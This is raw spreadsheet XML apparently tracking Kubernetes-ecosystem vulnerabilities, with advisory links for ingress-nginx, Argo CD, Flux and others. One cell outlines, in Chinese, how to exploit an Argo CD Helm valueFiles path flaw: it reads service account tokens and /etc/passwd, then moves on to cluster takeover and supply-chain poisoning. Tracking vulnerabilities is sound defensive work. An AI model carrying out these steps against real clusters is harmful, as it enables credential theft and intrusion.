      <c r="W45" s="43" t="s">
        <v>973</v>
      </c>
      <c r="X45" s="28" t="s">
        <v>1704</v>
      </c>
      <c r="Y45" s="28" t="s">
        <v>1629</v>
      </c>
      <c r="Z45" s="28"/>
    </row>
    <row r="46" s="24" customFormat="1" ht="360" spans="1:26">
      <c r="A46" s="5" t="s">
        <v>974</v>
      </c>
      <c r="B46" s="1" t="s">
        <v>1368</v>
      </c>
      <c r="C46" s="30" t="s">
        <v>1369</v>
      </c>
      <c r="D46" s="30" t="s">
        <v>1370</v>
      </c>
      <c r="E46" s="5" t="s">
        <v>957</v>
      </c>
      <c r="F46" s="5" t="s">
        <v>1374</v>
      </c>
      <c r="G46" s="5" t="s">
        <v>977</v>
      </c>
      <c r="H46" s="14" t="s">
        <v>976</v>
      </c>
      <c r="I46" s="5" t="s">
        <v>63</v>
      </c>
      <c r="J46" s="5" t="s">
        <v>1366</v>
      </c>
      <c r="K46" s="5" t="s">
        <v>70</v>
      </c>
      <c r="L46" s="5" t="s">
        <v>159</v>
      </c>
      <c r="M46" s="5" t="s">
        <v>1367</v>
      </c>
      <c r="N46" s="5" t="s">
        <v>1702</v>
      </c>
      <c r="O46" s="5" t="s">
        <v>981</v>
      </c>
      <c r="P46" s="5" t="s">
        <v>982</v>
      </c>
      <c r="Q46" s="42" t="s">
        <v>1630</v>
      </c>
      <c r="R46" s="5" t="s">
        <v>983</v>
      </c>
      <c r="S46" s="5" t="s">
        <v>1705</v>
      </c>
      <c r="T46" s="5" t="s">
        <v>984</v>
      </c>
      <c r="U46" s="5"/>
      <c r="V46" s="5"/>
      <c r="W46" s="43" t="s">
        <v>973</v>
      </c>
      <c r="X46" s="28" t="s">
        <v>1706</v>
      </c>
      <c r="Y46" s="28" t="s">
        <v>1629</v>
      </c>
      <c r="Z46" s="28"/>
    </row>
    <row r="47" s="24" customFormat="1" ht="360" spans="1:26">
      <c r="A47" s="5" t="s">
        <v>985</v>
      </c>
      <c r="B47" s="1" t="s">
        <v>1375</v>
      </c>
      <c r="C47" s="30" t="s">
        <v>1376</v>
      </c>
      <c r="D47" s="30" t="s">
        <v>1377</v>
      </c>
      <c r="E47" s="5" t="s">
        <v>957</v>
      </c>
      <c r="F47" s="5" t="s">
        <v>1380</v>
      </c>
      <c r="G47" s="5" t="s">
        <v>989</v>
      </c>
      <c r="H47" s="14" t="s">
        <v>988</v>
      </c>
      <c r="I47" s="5" t="s">
        <v>63</v>
      </c>
      <c r="J47" s="5" t="s">
        <v>1366</v>
      </c>
      <c r="K47" s="5" t="s">
        <v>70</v>
      </c>
      <c r="L47" s="5" t="s">
        <v>159</v>
      </c>
      <c r="M47" s="5" t="s">
        <v>1367</v>
      </c>
      <c r="N47" s="5" t="s">
        <v>1702</v>
      </c>
      <c r="O47" s="5" t="s">
        <v>969</v>
      </c>
      <c r="P47" s="5" t="s">
        <v>991</v>
      </c>
      <c r="Q47" s="42" t="s">
        <v>1630</v>
      </c>
      <c r="R47" s="5" t="s">
        <v>971</v>
      </c>
      <c r="S47" s="5" t="s">
        <v>1705</v>
      </c>
      <c r="T47" s="5" t="s">
        <v>972</v>
      </c>
      <c r="U47" s="5"/>
      <c r="V47" s="5"/>
      <c r="W47" s="43" t="s">
        <v>973</v>
      </c>
      <c r="X47" s="28" t="s">
        <v>1707</v>
      </c>
      <c r="Y47" s="28" t="s">
        <v>1629</v>
      </c>
      <c r="Z47" s="28"/>
    </row>
    <row r="48" s="24" customFormat="1" ht="382.5" spans="1:26">
      <c r="A48" s="5" t="s">
        <v>999</v>
      </c>
      <c r="B48" s="1" t="s">
        <v>1381</v>
      </c>
      <c r="C48" s="30" t="s">
        <v>1382</v>
      </c>
      <c r="D48" s="30" t="s">
        <v>1383</v>
      </c>
      <c r="E48" s="5"/>
      <c r="F48" s="5" t="s">
        <v>1000</v>
      </c>
      <c r="G48" s="5" t="s">
        <v>1003</v>
      </c>
      <c r="H48" s="5" t="s">
        <v>1002</v>
      </c>
      <c r="I48" s="5" t="s">
        <v>63</v>
      </c>
      <c r="J48" s="5" t="s">
        <v>1387</v>
      </c>
      <c r="K48" s="5" t="s">
        <v>70</v>
      </c>
      <c r="L48" s="5" t="s">
        <v>159</v>
      </c>
      <c r="M48" s="5" t="s">
        <v>1367</v>
      </c>
      <c r="N48" s="5" t="s">
        <v>1702</v>
      </c>
      <c r="O48" s="5" t="s">
        <v>1010</v>
      </c>
      <c r="P48" s="5" t="s">
        <v>1011</v>
      </c>
      <c r="Q48" s="42" t="s">
        <v>1630</v>
      </c>
      <c r="R48" s="5" t="s">
        <v>1012</v>
      </c>
      <c r="S48" s="5" t="s">
        <v>1705</v>
      </c>
      <c r="T48" s="5" t="s">
        <v>512</v>
      </c>
      <c r="U48" s="5" t="s">
        <v>482</v>
      </c>
      <c r="V48" s="5"/>
      <c r="W48" s="43" t="s">
        <v>1013</v>
      </c>
      <c r="X48" s="28" t="s">
        <v>1708</v>
      </c>
      <c r="Y48" s="28" t="s">
        <v>1629</v>
      </c>
      <c r="Z48" s="28"/>
    </row>
  </sheetData>
  <autoFilter xmlns:etc="http://www.wps.cn/officeDocument/2017/etCustomData" ref="A1:Z48" etc:filterBottomFollowUsedRange="0">
    <extLst/>
  </autoFilter>
  <hyperlinks>
    <hyperlink ref="G9" r:id="rId1" display="&#10;nginx-ingress:&#10;k8s: https://github.com/kubernetes/kubernetes/issues/126811" tooltip="https://github.com/kubernetes/kubernetes/issues/126811"/>
    <hyperlink ref="F8" r:id="rId2" display="Ingress-nginx path can be pointed to service account token file：A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use the spec.rules[].http.paths[].path field of an Ingress object (in the networking.k8s.io or extensions API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster." tooltip="https://github.com/kubernetes/ingress-nginx"/>
    <hyperlink ref="G8" r:id="rId3" display="https://github.com/kubernetes/kubernetes/issues/126812" tooltip="https://github.com/kubernetes/kubernetes/issues/126812"/>
    <hyperlink ref="F7" r:id="rId2" display="Ingress-nginx directive injection via annotations: A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use .metadata.annotations in an Ingress object (in the networking.k8s.io or extensions API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster." tooltip="https://github.com/kubernetes/ingress-nginx"/>
    <hyperlink ref="G7" r:id="rId4" display="https://github.com/kubernetes/kubernetes/issues/126813" tooltip="https://github.com/kubernetes/kubernetes/issues/126813"/>
    <hyperlink ref="G6" r:id="rId5" display="https://github.com/kubernetes/ingress-nginx/issues/10572" tooltip="https://github.com/kubernetes/ingress-nginx/issues/10572"/>
    <hyperlink ref="G10" r:id="rId6" display="https://github.com/istio/istio/security/advisories/GHSA-mq8f-9446-c28r" tooltip="https://github.com/istio/istio/security/advisories/GHSA-mq8f-9446-c28r"/>
    <hyperlink ref="G13" r:id="rId7" display="https://github.com/cri-o/cri-o/security/advisories/GHSA-6x2m-w449-qwx7"/>
    <hyperlink ref="G11" r:id="rId8" display="https://github.com/cri-o/cri-o/security/advisories/GHSA-2cgq-h8xw-2v5j"/>
    <hyperlink ref="H18" r:id="rId9" display="Patched versions&#10;0.55.1&#10;&#10;&#10;https://github.com/kubevirt/kubevirt/pull/8198&#10;https://github.com/kubevirt/kubevirt/pull/8268&#10;&#10;"/>
    <hyperlink ref="H19" r:id="rId10" display="kubevirt 0.30&#10;&#10;https://github.com/kubevirt/kubevirt/pull/3686"/>
    <hyperlink ref="G20" r:id="rId11" display="https://github.com/argoproj/argo-workflows/security/advisories/GHSA-cmv8-6362-r5w9"/>
    <hyperlink ref="G33" r:id="rId12" display="https://github.com/fluxcd/kustomize-controller/security/advisories/GHSA-35rf-v2jv-gfg7"/>
    <hyperlink ref="G16" r:id="rId13" display="https://github.com/cilium/cilium/security/advisories/GHSA-gj2r-phwg-6rww"/>
    <hyperlink ref="G17" r:id="rId14" display="https://github.com/projectcontour/contour/security/advisories/GHSA-5ph6-qq5x-7jwc"/>
    <hyperlink ref="G27" r:id="rId15" display="https://github.com/argoproj/argo-cd/security/advisories/GHSA-h6h5-6fmq-rh28"/>
    <hyperlink ref="H28" r:id="rId16" display="2.6.1&#10;https://github.com/argoproj/argo-cd/pull/12320/commits/200c3c156e9c27c6c5b197a5be28315e9b802b12"/>
    <hyperlink ref="G28" r:id="rId17" display="https://github.com/argoproj/argo-cd/issues/12309&#10;&#10;https://github.com/argoproj/argo-cd/security/advisories/GHSA-mv6w-j4xc-qpfw"/>
    <hyperlink ref="G25" r:id="rId18" display="https://github.com/argoproj/argo-events/security/advisories/GHSA-qpgx-64h2-gc3c&#10;&#10;https://github.com/argoproj/argo-events/issues/1947"/>
    <hyperlink ref="J26" r:id="rId19" display="https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/&#10;&#10;&#10; 1..敏感信息泄露&#10;​目标文件：&#10;Kubernetes Secrets（如/var/run/secrets/kubernetes.io/serviceaccount/token）；&#10;其他应用的明文配置文件（如数据库凭证）；&#10;系统敏感文件（如/etc/passwd）。&#10;​攻击步骤：&#10;提交包含恶意valueFiles路径的Helm Chart至仓库；&#10;Argo CD同步时触发helmTemplate逻辑；&#10;url.ParseRequestURI()误判路径为URI，跳过EnforceToCurrentRoot()检查；&#10;读取目标文件内容并解析为YAML参数，通过Argo CD API或UI泄露。&#10;2. ​横向移动与权限提升&#10;​场景延伸：&#10;窃取集群管理员Token，通过kubectl接管集群；&#10;读取其他应用的values.yaml，获取数据库连接字符串等敏感信息；&#10;利用泄露的SSH密钥访问内部系统。&#10;​利用链示例：&#10;mermaid&#10;graph TD&#10;    A[提交恶意Chart] --&gt; B[绕过路径检查]&#10;    B --&gt; C[读取ServiceAccount Token]&#10;    C --&gt; D[通过kubectl执行任意命令]&#10;    D --&gt; E[部署恶意Pod或窃取数据]&#10;3. ​供应链攻击&#10;​污染公共Helm仓库：&#10;攻击者上传包含恶意valueFiles的Chart至公共仓库（如Artifact Hub），诱导用户部署。&#10;​后果：&#10;所有使用该Chart的Argo CD实例自动同步后，敏感数据将泄露至攻击者控制的端点&#10;&#10;"/>
    <hyperlink ref="G24" r:id="rId20" display="https://github.com/argoproj/argo-workflows/issues/6441&#10;&#10;https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h563-xh25-x54q"/>
    <hyperlink ref="G31" r:id="rId21" display="https://github.com/backstage/backstage/security/advisories/GHSA-wg6p-jmpc-xjmr"/>
    <hyperlink ref="G32" r:id="rId22" display="https://github.com/backstage/backstage/security/advisories/GHSA-pvv8-8fx9-h673"/>
    <hyperlink ref="H34" r:id="rId23" display="https://github.com/fluxcd/source-controller/pull/903/commits/27f4ed5a472d1bd5b6bc7a62189f20c115338b3a"/>
    <hyperlink ref="G35" r:id="rId24" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-p2g7-xwvr-rrw3"/>
    <hyperlink ref="G34" r:id="rId25" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-f4p5-x4vc-mh4v"/>
    <hyperlink ref="G37" r:id="rId26" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-7pwf-jg34-hxwp"/>
    <hyperlink ref="G18" r:id="rId27" display="https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364&#10;&#10;google research:&#10;https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm"/>
    <hyperlink ref="G19" r:id="rId28" display="https://bugzilla.redhat.com/show_bug.cgi?id=1848951"/>
    <hyperlink ref="G15" r:id="rId29" display="https://github.com/containerd/containerd/security/advisories/GHSA-5ffw-gxpp-mxpf"/>
    <hyperlink ref="G42" r:id="rId30" display="https://github.com/metal3-io/baremetal-operator/security/advisories/GHSA-pqfh-xh7w-7h3p"/>
    <hyperlink ref="G2" r:id="rId31" display="https://github.com/kubernetes/kubernetes/issues/126744"/>
    <hyperlink ref="G38" r:id="rId32" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-vvmq-fwmg-2gjc" tooltip="https://github.com/fluxcd/flux2/security/advisories/GHSA-vvmq-fwmg-2gjc"/>
    <hyperlink ref="G21" r:id="rId33" display="https://github.com/argoproj/argo-cd/security/advisories/GHSA-q4w5-4gq2-98vm"/>
    <hyperlink ref="G22" r:id="rId34" display="https://github.com/argoproj/argo-cd/security/advisories/GHSA-jhqp-vf4w-rpwq"/>
    <hyperlink ref="G47" r:id="rId35" display="https://github.com/kubernetes/kubernetes/issues/131006" tooltip="https://github.com/kubernetes/kubernetes/issues/131006"/>
    <hyperlink ref="G46" r:id="rId36" display="https://github.com/kubernetes/kubernetes/issues/131008" tooltip="https://github.com/kubernetes/kubernetes/issues/131008"/>
    <hyperlink ref="G45" r:id="rId37" display="https://github.com/kubernetes/kubernetes/issues/131007" tooltip="https://github.com/kubernetes/kubernetes/issues/131007"/>
    <hyperlink ref="G48" r:id="rId38" display="https://github.com/kubernetes/kubernetes/issues/131005&#10;&#10;https://github.com/advisories/GHSA-242m-6h72-7hgp"/>
    <hyperlink ref="H47" r:id="rId39" display="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/ab470eb920924d62a197ebddd8a4cc3031a77ddf"/>
    <hyperlink ref="H46" r:id="rId40" display="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/2e9f37380afb7853fa6daa1c3e6659550aadfd90"/>
    <hyperlink ref="P17" r:id="rId41" display="https://github.com/projectcontour/contour/commit/b53a5c4fd927f4ea2c6cf02f1359d8e28bef852e"/>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8"/>
  <sheetViews>
    <sheetView topLeftCell="A11" workbookViewId="0">
      <selection activeCell="P27" sqref="P27"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.89166666666667" defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="2" width="19.6666666666667" style="1" customWidth="1"/>
    <col min="3" max="3" width="21" style="2" customWidth="1"/>
    <col min="4" max="4" width="27" style="2" customWidth="1"/>
    <col min="5" max="5" width="27.225" style="2" customWidth="1"/>
    <col min="6" max="6" width="32.9166666666667" style="1" customWidth="1"/>
    <col min="7" max="7" width="39.8916666666667" style="2" customWidth="1"/>
    <col min="8" max="8" width="19.6666666666667" style="1" customWidth="1"/>
    <col min="9" max="9" width="43.1083333333333" style="1" customWidth="1"/>
    <col min="10" max="10" width="64.325" style="1" customWidth="1"/>
    <col min="11" max="11" width="53.0833333333333" style="1" customWidth="1"/>
    <col min="12" max="12" width="27.775" style="1" customWidth="1"/>
    <col min="13" max="13" width="11.3333333333333" style="1" customWidth="1"/>
    <col min="14" max="14" width="42.3333333333333" style="1" customWidth="1"/>
    <col min="15" max="15" width="49.1" style="1" customWidth="1"/>
    <col min="16" max="17" width="8.89166666666667" style="1"/>
    <col min="18" max="18" width="46.6333333333333" style="1" customWidth="1"/>
    <col min="19" max="19" width="39.7666666666667" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:19">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>1014</v>
      </c>
      <c r="C1" s="3" t="s">
        <v>1015</v>
      </c>
      <c r="D1" s="2" t="s">
        <v>1016</v>
      </c>
      <c r="E1" s="2" t="s">
        <v>1017</v>
      </c>
      <c r="F1" s="1" t="s">
        <v>19</v>
      </c>
      <c r="G1" s="2" t="s">
        <v>1018</v>
      </c>
      <c r="H1" s="1" t="s">
        <v>1</v>
      </c>
      <c r="I1" s="1" t="s">
        <v>2</v>
      </c>
      <c r="J1" s="1" t="s">
        <v>3</v>
      </c>
      <c r="K1" s="1" t="s">
        <v>5</v>
      </c>
      <c r="L1" s="1" t="s">
        <v>6</v>
      </c>
      <c r="M1" s="1" t="s">
        <v>7</v>
      </c>
      <c r="N1" s="1" t="s">
        <v>8</v>
      </c>
      <c r="O1" s="1" t="s">
        <v>9</v>
      </c>
      <c r="P1" s="1" t="s">
        <v>38</v>
      </c>
      <c r="Q1" s="1" t="s">
        <v>43</v>
      </c>
      <c r="R1" s="1" t="s">
        <v>45</v>
      </c>
      <c r="S1" s="1" t="s">
        <v>46</v>
      </c>
    </row>
    <row r="2" spans="1:19">
      <c r="A2" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="B2" s="4" t="s">
        <v>57</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>1023</v>
      </c>
      <c r="D2" s="2" t="s">
        <v>1024</v>
      </c>
      <c r="E2" s="2" t="s">
        <v>1025</v>
      </c>
      <c r="F2" s="4" t="s">
        <v>1026</v>
      </c>
      <c r="G2" s="2" t="s">
        <v>1027</v>
      </c>
      <c r="H2" s="4"/>
      <c r="I2" s="1" t="s">
        <v>1028</v>
      </c>
      <c r="J2" s="4" t="s">
        <v>59</v>
      </c>
      <c r="K2" s="4" t="s">
        <v>61</v>
      </c>
      <c r="L2" s="13" t="s">
        <v>62</v>
      </c>
      <c r="M2" s="4" t="s">
        <v>63</v>
      </c>
      <c r="N2" s="4" t="s">
        <v>64</v>
      </c>
      <c r="O2" s="4" t="s">
        <v>65</v>
      </c>
      <c r="P2" s="4" t="s">
        <v>91</v>
      </c>
      <c r="Q2" s="4" t="s">
        <v>1033</v>
      </c>
      <c r="R2" s="4" t="s">
        <v>1034</v>
      </c>
      <c r="S2" s="4" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="3" spans="1:19">
      <c r="A3" s="4" t="s">
        <v>107</v>
      </c>
      <c r="B3" s="4" t="s">
        <v>1040</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>1041</v>
      </c>
      <c r="D3" s="2" t="s">
        <v>1042</v>
      </c>
      <c r="E3" s="2" t="s">
        <v>1043</v>
      </c>
      <c r="F3" s="4" t="s">
        <v>116</v>
      </c>
      <c r="G3" s="2" t="s">
        <v>1044</v>
      </c>
      <c r="H3" s="4" t="s">
        <v>108</v>
      </c>
      <c r="I3" s="4"/>
      <c r="J3" s="4" t="s">
        <v>109</v>
      </c>
      <c r="K3" s="4" t="s">
        <v>111</v>
      </c>
      <c r="L3" s="4" t="s">
        <v>112</v>
      </c>
      <c r="M3" s="4" t="s">
        <v>63</v>
      </c>
      <c r="N3" s="4" t="s">
        <v>113</v>
      </c>
      <c r="O3" s="4" t="s">
        <v>1045</v>
      </c>
      <c r="P3" s="4" t="s">
        <v>91</v>
      </c>
      <c r="Q3" s="4" t="s">
        <v>1033</v>
      </c>
      <c r="R3" s="4" t="s">
        <v>1034</v>
      </c>
      <c r="S3" s="1" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="4" spans="1:19">
      <c r="A4" s="4" t="s">
        <v>131</v>
      </c>
      <c r="B4" s="4" t="s">
        <v>1048</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>1049</v>
      </c>
      <c r="D4" s="2" t="s">
        <v>1050</v>
      </c>
      <c r="E4" s="2" t="s">
        <v>1051</v>
      </c>
      <c r="F4" s="4" t="s">
        <v>116</v>
      </c>
      <c r="G4" s="2" t="s">
        <v>1052</v>
      </c>
      <c r="H4" s="4" t="s">
        <v>71</v>
      </c>
      <c r="I4" s="4"/>
      <c r="J4" s="4" t="s">
        <v>132</v>
      </c>
      <c r="K4" s="4" t="s">
        <v>134</v>
      </c>
      <c r="L4" s="4" t="s">
        <v>135</v>
      </c>
      <c r="M4" s="4" t="s">
        <v>63</v>
      </c>
      <c r="N4" s="4"/>
      <c r="O4" s="4" t="s">
        <v>136</v>
      </c>
      <c r="P4" s="4" t="s">
        <v>91</v>
      </c>
      <c r="Q4" s="4" t="s">
        <v>1033</v>
      </c>
      <c r="R4" s="4" t="s">
        <v>1034</v>
      </c>
      <c r="S4" s="1" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="5" spans="1:19">
      <c r="A5" s="4" t="s">
        <v>138</v>
      </c>
      <c r="B5" s="4" t="s">
        <v>1053</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>1054</v>
      </c>
      <c r="D5" s="2" t="s">
        <v>1055</v>
      </c>
      <c r="E5" s="2" t="s">
        <v>1056</v>
      </c>
      <c r="F5" s="4" t="s">
        <v>146</v>
      </c>
      <c r="G5" s="2" t="s">
        <v>1057</v>
      </c>
      <c r="H5" s="4" t="s">
        <v>71</v>
      </c>
      <c r="I5" s="4" t="s">
        <v>139</v>
      </c>
      <c r="J5" s="4" t="s">
        <v>140</v>
      </c>
      <c r="K5" s="4" t="s">
        <v>142</v>
      </c>
      <c r="L5" s="4" t="s">
        <v>143</v>
      </c>
      <c r="M5" s="4" t="s">
        <v>63</v>
      </c>
      <c r="N5" s="4"/>
      <c r="O5" s="4" t="s">
        <v>144</v>
      </c>
      <c r="P5" s="4" t="s">
        <v>150</v>
      </c>
      <c r="Q5" s="4" t="s">
        <v>1033</v>
      </c>
      <c r="R5" s="4" t="s">
        <v>1034</v>
      </c>
      <c r="S5" s="1" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="6" spans="1:19">
      <c r="A6" s="1" t="s">
        <v>1058</v>
      </c>
      <c r="B6" s="4" t="s">
        <v>153</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>1059</v>
      </c>
      <c r="D6" s="2" t="s">
        <v>1060</v>
      </c>
      <c r="E6" s="2" t="s">
        <v>1061</v>
      </c>
      <c r="F6" s="1" t="s">
        <v>160</v>
      </c>
      <c r="G6" s="2" t="s">
        <v>1062</v>
      </c>
      <c r="I6" s="1" t="s">
        <v>139</v>
      </c>
      <c r="J6" s="1" t="s">
        <v>154</v>
      </c>
      <c r="K6" s="1" t="s">
        <v>155</v>
      </c>
      <c r="L6" s="1" t="s">
        <v>156</v>
      </c>
      <c r="M6" s="4" t="s">
        <v>63</v>
      </c>
      <c r="O6" s="1" t="s">
        <v>157</v>
      </c>
      <c r="P6" s="4" t="s">
        <v>150</v>
      </c>
      <c r="Q6" s="4" t="s">
        <v>1033</v>
      </c>
      <c r="R6" s="4" t="s">
        <v>1034</v>
      </c>
      <c r="S6" s="1" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="7" spans="1:19">
      <c r="A7" s="1" t="s">
        <v>1064</v>
      </c>
      <c r="B7" s="4" t="s">
        <v>171</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>1065</v>
      </c>
      <c r="D7" s="2" t="s">
        <v>1066</v>
      </c>
      <c r="E7" s="2" t="s">
        <v>1067</v>
      </c>
      <c r="F7" s="1" t="s">
        <v>1068</v>
      </c>
      <c r="G7" s="2" t="s">
        <v>1069</v>
      </c>
      <c r="I7" s="1" t="s">
        <v>1028</v>
      </c>
      <c r="J7" s="1" t="s">
        <v>172</v>
      </c>
      <c r="K7" s="1" t="s">
        <v>174</v>
      </c>
      <c r="L7" s="1" t="s">
        <v>175</v>
      </c>
      <c r="M7" s="4" t="s">
        <v>63</v>
      </c>
      <c r="O7" s="1" t="s">
        <v>1070</v>
      </c>
      <c r="P7" s="4" t="s">
        <v>150</v>
      </c>
      <c r="Q7" s="4" t="s">
        <v>1033</v>
      </c>
      <c r="R7" s="4" t="s">
        <v>1034</v>
      </c>
      <c r="S7" s="1" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="8" spans="1:19">
      <c r="A8" s="1" t="s">
        <v>183</v>
      </c>
      <c r="B8" s="4" t="s">
        <v>183</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>1071</v>
      </c>
      <c r="D8" s="2" t="s">
        <v>1072</v>
      </c>
      <c r="E8" s="2" t="s">
        <v>1073</v>
      </c>
      <c r="F8" s="1" t="s">
        <v>189</v>
      </c>
      <c r="G8" s="2" t="s">
        <v>1074</v>
      </c>
      <c r="H8" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J8" s="1" t="s">
        <v>185</v>
      </c>
      <c r="K8" s="1" t="s">
        <v>186</v>
      </c>
      <c r="L8" s="1" t="s">
        <v>187</v>
      </c>
      <c r="M8" s="4" t="s">
        <v>63</v>
      </c>
      <c r="O8" s="1" t="s">
        <v>188</v>
      </c>
      <c r="P8" s="4" t="s">
        <v>91</v>
      </c>
      <c r="Q8" s="4" t="s">
        <v>1033</v>
      </c>
      <c r="R8" s="4" t="s">
        <v>1034</v>
      </c>
      <c r="S8" s="1" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="9" spans="1:19">
      <c r="A9" s="1" t="s">
        <v>193</v>
      </c>
      <c r="B9" s="4" t="s">
        <v>193</v>
      </c>
      <c r="C9" s="2" t="s">
        <v>1076</v>
      </c>
      <c r="D9" s="2" t="s">
        <v>1077</v>
      </c>
      <c r="E9" s="2" t="s">
        <v>1078</v>
      </c>
      <c r="F9" s="1" t="s">
        <v>200</v>
      </c>
      <c r="G9" s="2" t="s">
        <v>1079</v>
      </c>
      <c r="H9" s="1" t="s">
        <v>1080</v>
      </c>
      <c r="I9" s="1" t="s">
        <v>1028</v>
      </c>
      <c r="J9" s="1" t="s">
        <v>195</v>
      </c>
      <c r="K9" s="1" t="s">
        <v>197</v>
      </c>
      <c r="L9" s="1" t="s">
        <v>198</v>
      </c>
      <c r="M9" s="4" t="s">
        <v>63</v>
      </c>
      <c r="O9" s="1" t="s">
        <v>1081</v>
      </c>
      <c r="P9" s="4" t="s">
        <v>150</v>
      </c>
      <c r="Q9" s="4" t="s">
        <v>1033</v>
      </c>
      <c r="R9" s="4" t="s">
        <v>1034</v>
      </c>
      <c r="S9" s="1" t="s">
        <v>204</v>
      </c>
    </row>
    <row r="10" ht="281.25" spans="1:19">
      <c r="A10" s="5" t="s">
        <v>209</v>
      </c>
      <c r="B10" s="6" t="s">
        <v>209</v>
      </c>
      <c r="C10" s="7" t="s">
        <v>1087</v>
      </c>
      <c r="D10" s="7" t="s">
        <v>1088</v>
      </c>
      <c r="E10" s="7" t="s">
        <v>1089</v>
      </c>
      <c r="F10" s="5" t="s">
        <v>219</v>
      </c>
      <c r="G10" s="7" t="s">
        <v>1090</v>
      </c>
      <c r="H10" s="5" t="s">
        <v>210</v>
      </c>
      <c r="I10" s="5"/>
      <c r="J10" s="5" t="s">
        <v>211</v>
      </c>
      <c r="K10" s="5" t="s">
        <v>1091</v>
      </c>
      <c r="L10" s="5" t="s">
        <v>214</v>
      </c>
      <c r="M10" s="5" t="s">
        <v>215</v>
      </c>
      <c r="N10" s="5"/>
      <c r="O10" s="5" t="s">
        <v>216</v>
      </c>
      <c r="P10" s="6"/>
      <c r="Q10" s="5"/>
      <c r="R10" s="5"/>
      <c r="S10" s="5"/>
    </row>
    <row r="11" ht="393.75" spans="1:19">
      <c r="A11" s="5" t="s">
        <v>227</v>
      </c>
      <c r="B11" s="6" t="s">
        <v>1093</v>
      </c>
      <c r="C11" s="7" t="s">
        <v>1094</v>
      </c>
      <c r="D11" s="7" t="s">
        <v>1095</v>
      </c>
      <c r="E11" s="7" t="s">
        <v>1096</v>
      </c>
      <c r="F11" s="5" t="s">
        <v>1097</v>
      </c>
      <c r="G11" s="7" t="s">
        <v>1098</v>
      </c>
      <c r="H11" s="5" t="s">
        <v>228</v>
      </c>
      <c r="I11" s="5" t="s">
        <v>229</v>
      </c>
      <c r="J11" s="5" t="s">
        <v>230</v>
      </c>
      <c r="K11" s="5" t="s">
        <v>232</v>
      </c>
      <c r="L11" s="14" t="s">
        <v>233</v>
      </c>
      <c r="M11" s="5" t="s">
        <v>234</v>
      </c>
      <c r="N11" s="5" t="s">
        <v>235</v>
      </c>
      <c r="O11" s="5" t="s">
        <v>1099</v>
      </c>
      <c r="P11" s="5"/>
      <c r="Q11" s="5"/>
      <c r="R11" s="5"/>
      <c r="S11" s="5"/>
    </row>
    <row r="12" ht="146.25" spans="1:19">
      <c r="A12" s="5" t="s">
        <v>244</v>
      </c>
      <c r="B12" s="6" t="s">
        <v>244</v>
      </c>
      <c r="C12" s="7" t="s">
        <v>1101</v>
      </c>
      <c r="D12" s="7" t="s">
        <v>1102</v>
      </c>
      <c r="E12" s="7" t="s">
        <v>1103</v>
      </c>
      <c r="F12" s="5" t="s">
        <v>254</v>
      </c>
      <c r="G12" s="7" t="s">
        <v>1104</v>
      </c>
      <c r="H12" s="5" t="s">
        <v>245</v>
      </c>
      <c r="I12" s="5" t="s">
        <v>246</v>
      </c>
      <c r="J12" s="5" t="s">
        <v>247</v>
      </c>
      <c r="K12" s="5" t="s">
        <v>249</v>
      </c>
      <c r="L12" s="5" t="s">
        <v>250</v>
      </c>
      <c r="M12" s="5" t="s">
        <v>234</v>
      </c>
      <c r="N12" s="5" t="s">
        <v>251</v>
      </c>
      <c r="O12" s="5" t="s">
        <v>252</v>
      </c>
      <c r="P12" s="5"/>
      <c r="Q12" s="5"/>
      <c r="R12" s="5"/>
      <c r="S12" s="5"/>
    </row>
    <row r="13" ht="225" spans="1:19">
      <c r="A13" s="5" t="s">
        <v>259</v>
      </c>
      <c r="B13" s="6" t="s">
        <v>259</v>
      </c>
      <c r="C13" s="7" t="s">
        <v>1105</v>
      </c>
      <c r="D13" s="8" t="s">
        <v>1106</v>
      </c>
      <c r="E13" s="8" t="s">
        <v>1107</v>
      </c>
      <c r="F13" s="5" t="s">
        <v>1108</v>
      </c>
      <c r="G13" s="7" t="s">
        <v>1109</v>
      </c>
      <c r="H13" s="5" t="s">
        <v>260</v>
      </c>
      <c r="I13" s="5" t="s">
        <v>261</v>
      </c>
      <c r="J13" s="5" t="s">
        <v>262</v>
      </c>
      <c r="K13" s="5" t="s">
        <v>264</v>
      </c>
      <c r="L13" s="14" t="s">
        <v>265</v>
      </c>
      <c r="M13" s="5" t="s">
        <v>234</v>
      </c>
      <c r="N13" s="5" t="s">
        <v>266</v>
      </c>
      <c r="O13" s="5" t="s">
        <v>267</v>
      </c>
      <c r="P13" s="5"/>
      <c r="Q13" s="5"/>
      <c r="R13" s="5"/>
      <c r="S13" s="5"/>
    </row>
    <row r="14" ht="409.5" spans="1:19">
